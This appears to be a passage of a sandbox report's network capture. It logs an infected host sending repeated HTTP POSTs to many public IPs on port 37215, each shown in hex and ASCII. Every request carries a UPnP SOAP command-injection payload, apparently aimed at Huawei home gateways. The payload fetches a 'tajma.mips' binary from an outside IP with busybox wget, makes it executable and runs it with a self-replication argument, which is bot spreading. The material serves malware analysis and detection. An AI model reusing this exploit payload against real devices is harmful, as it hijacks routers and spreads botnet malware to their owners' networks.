                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2876192.168.2.2353184145.22.110.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651779890 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2877192.168.2.235288442.46.212.8337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651787043 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2878192.168.2.2340948157.152.189.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.652038097 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2879192.168.2.235446441.232.251.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.652043104 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2880192.168.2.2347122157.219.1.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.652043104 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2881192.168.2.2355972197.77.89.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.652050972 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2882192.168.2.2347836122.241.11.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.652053118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2883192.168.2.234600441.123.214.3237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.655632019 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2884192.168.2.2349356197.51.44.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.655646086 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2885192.168.2.2348742197.147.70.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.655663967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
